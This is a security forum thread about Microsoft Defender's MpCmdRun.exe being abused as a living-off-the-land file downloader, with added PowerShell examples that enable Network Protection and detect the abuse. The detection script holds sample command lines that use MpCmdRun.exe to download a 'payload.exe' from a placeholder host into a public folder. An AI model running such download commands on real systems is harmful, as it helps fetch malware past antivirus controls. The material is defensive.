Microsoft Defender can ironically be used to download malware

Status
Not open for further replies.

danb (thread author, VoodooShield)
It is a fairly logical move. Microsoft introduced so many LOLBins in the past, so why should it stop? But truly, this is the most stupid one. 🙃
Of course, this LOLBin is equally dangerous for any AV (for now).

Edit.
No problem for H_C, VS, and SWH due to anti-script (command-line) protection.
Like any other LOLBin which tries to download something, this one can be mitigated in WD by activating WD Network Protection. This will activate the SmartScreen URL check.
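As an added example (not code from the thread or from any of the products mentioned), the check a practitioner would run after reading the post above: confirm which Antimalware Platform version the host is on, and make sure Network Protection is actually in block mode rather than audit mode or off. The version 4.18.2008.9 is the one the thread names as the latest client; treating it as the minimum is an assumption for this snippet. Run it in an elevated PowerShell on a Windows 10 host with Microsoft Defender as the active AV.

```powershell
# Added example, not from the thread. Checks the Defender platform version and
# turns on Network Protection (the SmartScreen URL check the post refers to).
# Requires an elevated PowerShell session and the Defender module (Windows 10).

# Platform version the thread points to as the current client; assumption: treat
# anything older as "update the platform first".
$MinimumPlatform = [version]'4.18.2008.9'

$status   = Get-MpComputerStatus
$platform = [version]$status.AMProductVersion   # AMProductVersion = platform, AMEngineVersion = engine
if ($platform -lt $MinimumPlatform) {
    Write-Warning "Antimalware platform $platform is older than $MinimumPlatform; update the platform before relying on it."
} else {
    Write-Host "Antimalware platform $platform is at or above $MinimumPlatform."
}

# EnableNetworkProtection: 0 = Disabled, 1 = Enabled (block), 2 = AuditMode.
# Audit mode only logs the URL reputation verdict; it does not stop the download.
$pref = Get-MpPreference
switch ([int]$pref.EnableNetworkProtection) {
    1 { Write-Host 'Network Protection is already enabled in block mode.' }
    2 {
        Write-Warning 'Network Protection is in audit mode (log only); switching to block mode.'
        Set-MpPreference -EnableNetworkProtection Enabled
    }
    default {
        Write-Warning 'Network Protection is disabled; enabling it in block mode.'
        Set-MpPreference -EnableNetworkProtection Enabled
    }
}

# Re-read the setting to confirm the change took effect (expect 1).
$after = (Get-MpPreference).EnableNetworkProtection
Write-Host "EnableNetworkProtection is now: $after"

# When Network Protection fires, the verdict is written to the Defender operational log:
# event 1126 = blocked, 1125 = audit-mode hit. Useful to confirm a test URL was actually stopped.
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Windows Defender/Operational'; Id = 1125, 1126 } -MaxEvents 10 -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Id, Message
```

Network Protection only helps against the download step, and only for URLs SmartScreen already classifies as malicious; a payload hosted on a reputation-clean domain will still come down, which is why the later posts in the thread treat the LOLBin as a command-line problem rather than a URL problem.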
 
> this one can be mitigated in WD by activating WD Network Protection

Probably speculation: Is this why there were these multiple updates to the Antimalware Platform recently? I'm flashing on the recent conflict between Network Inspection Service and Memory Integrity. There had to have been some exceedingly good reasons.

Even though the update to version 4.18.4008.4 "fixed" this, maybe in light of this information, it's better to continue on to update to the very latest Client version: 4.18.2008.9.
 
> Even though the update to version 4.18.4008.4 "fixed" this, maybe in light of this information, it's better to continue on to update to the very latest Client version: 4.18.2008.9.

"In tests conducted by BleepingComputer.com, this feature was added to Microsoft Defender in version 4.18.2007.9 or 4.18.2009.9."
 
> Probably speculation: Is this why there were these multiple updates to the Antimalware Platform recently? I'm flashing on the recent conflict between Network Inspection Service and Memory Integrity. There had to have been some exceedingly good reasons.
>
> Even though the update to version 4.18.4008.4 "fixed" this, maybe in light of this information, it's better to continue on to update to the very latest Client version: 4.18.2008.9.
Hmmmm... interesting observation, I think you are on to something ;).

I will say, MS has come a VERY long way with WD and it truly is amazing now. It does need A LOT of work on usability. I mean, just to create an exception for one folder or to restore files from quarantine takes like 50 clicks and 20 minutes ;).

I can FINALLY say this... really all you need is WD and VS and you are good to go. I kinda saw this coming a couple of years ago... I just had no idea that they would work together THIS well. In all fairness, I should not be surprised... it was all by design ;).
 
> It is a fairly logical move. Microsoft introduced so many LOLBins in the past, so why should it stop? But truly, this is the most stupid one. 🙃
> Of course, this LOLBin is equally dangerous for any AV (for now).
>
> Edit.
> No problem for H_C, VS, and SWH due to anti-script (command-line) protection.
And your new creation will block system calls as well, right? ;).
> I just blocked MpCmdRun.exe, thanks Dan. /s
>
> I believe this could happen to any antivirus vendor if they had more market share.
Sure, thank you as well! Yeah, I believe this too... it is all about marketshare.

That is why having another layer of unknown protection (to the attacker) makes a lot of sense.
 
Thank you for this post. I will be visiting family members' homes to install another solution until this is fixed.
> The good news is that Microsoft Defender will detect malicious files downloaded with MpCmdRun.exe, but it is unknown if other AV software will allow this program to bypass their detections.

Sure, so in other words let's spread the information to cyber criminals so they can exploit other software, L0L. They don't call it "bleeping computer" for nothing.
 
> And your new creation will block system calls as well, right? ;).
Heaven forbid!
I do not create software to kill the system.

Edit.
In fact, thanks to SRP, MpCmdRun.exe can be blocked for malware (in the home environment) and still allowed for a few WD scheduled system tasks.
> Thank you for this post. I will be visiting family members' homes to install another solution until this is fixed.
You will waste your time and bloat the system by installing and reinstalling security solutions.
  1. There are already several LOLBins in the system that can do the same and have been used by malc0ders for a long time. So this new one does not increase the danger for home users. It can be less visible in the incidents available in enterprise solutions.
  2. This LOLBin will work with any AV as well (similarly to most LOLBins); it does not require WD to be enabled.
  3. WD will probably be the first to secure this by Machine Learning (locally or in the cloud). It is easy because it is known what kind of file should be downloaded (WD update).
You should rather think about how to prevent/mitigate other popular LOLBins.
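The thread's last two points (Defender will detect the payload, but the LOLBin itself works regardless of which AV is installed and may not stand out in incident data) leave the detection question open. As an added example, not code from the thread or from any product mentioned in it, the following PowerShell flags process command lines that use MpCmdRun.exe as a downloader. The thread never names the switch; the `-DownloadFile -url <url> -path <dest>` syntax is taken from the public reporting of this LOLBin. The sample command lines are constructed, and the "expected origin" domain pattern is an assumption to tune for your own environment.

```powershell
# Added example, not from the thread. Flags MpCmdRun.exe being used as a file
# downloader and pulls out the URL and destination for triage. The sample
# command lines below are constructed; the microsoft.com origin check is an assumption.

function Test-MpCmdRunDownload {
    param([Parameter(Mandatory)][string]$CommandLine)

    # Image name may be quoted, given by full path, or copied elsewhere and run
    # from a user-writable directory; switches are case-insensitive on the Defender CLI.
    if ($CommandLine -notmatch '(?i)MpCmdRun\.exe') { return $null }
    if ($CommandLine -notmatch '(?i)-DownloadFile')  { return $null }

    $url  = if ($CommandLine -match '(?i)-url\s+"?([^\s"]+)')            { $Matches[1] } else { '' }
    $dest = if ($CommandLine -match '(?i)-path\s+"?([^"]+?)"?(\s|$)')     { $Matches[1] } else { '' }

    # Binary running from outside the Defender platform directories is a renamed/copied LOLBin.
    $fromDefenderDir = $CommandLine -match '(?i)\\(Program Files\\Windows Defender|ProgramData\\Microsoft\\Windows Defender\\Platform)\\'

    # Assumption: a legitimate update fetch comes from Microsoft infrastructure over HTTPS.
    $expectedOrigin = $url -match '(?i)^https://[^/]*\.microsoft\.com/'

    [pscustomobject]@{
        CommandLine      = $CommandLine
        Url              = $url
        Destination      = $dest
        FromDefenderDir  = $fromDefenderDir
        Suspicious       = (-not $expectedOrigin) -or (-not $fromDefenderDir)
    }
}

# Constructed sample command lines: one benign scan, one download from a non-Microsoft
# host, one copied binary pulling from an internal IP over plain HTTP.
$samples = @(
    '"C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 1',
    '"C:\Program Files\Windows Defender\MpCmdRun.exe" -DownloadFile -url https://example.invalid/payload.exe -path C:\Users\Public\update.exe',
    'C:\Users\Public\MpCmdRun.exe -downloadfile -url http://10.0.0.5/a.bin -path "C:\Users\Public\Documents\a.bin"'
)

$samples | ForEach-Object { Test-MpCmdRunDownload -CommandLine $_ } |
    Where-Object { $_ } |
    Format-Table Suspicious, FromDefenderDir, Url, Destination -AutoSize

# On a live host, feed real command lines instead of $samples. This needs command-line
# auditing turned on (Security event 4688 with "Include command line in process creation
# events", or Sysmon event 1); the message text is parsed rather than relying on field order.
# Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents 5000 |
#     ForEach-Object {
#         if ($_.Message -match 'Process Command Line:\s*(.+)') { Test-MpCmdRunDownload -CommandLine $Matches[1] }
#     } | Where-Object { $_ -and $_.Suspicious }
```

Only the second and third sample lines are reported; the plain scan is ignored. The point of flagging on the command line rather than on the image hash is exactly the one made in the thread: the binary is a signed Microsoft file that every AV will leave alone, so the download switch, the destination under a user-writable path, and a copy of the executable sitting outside the Defender directories are what distinguish abuse from the scheduled update tasks.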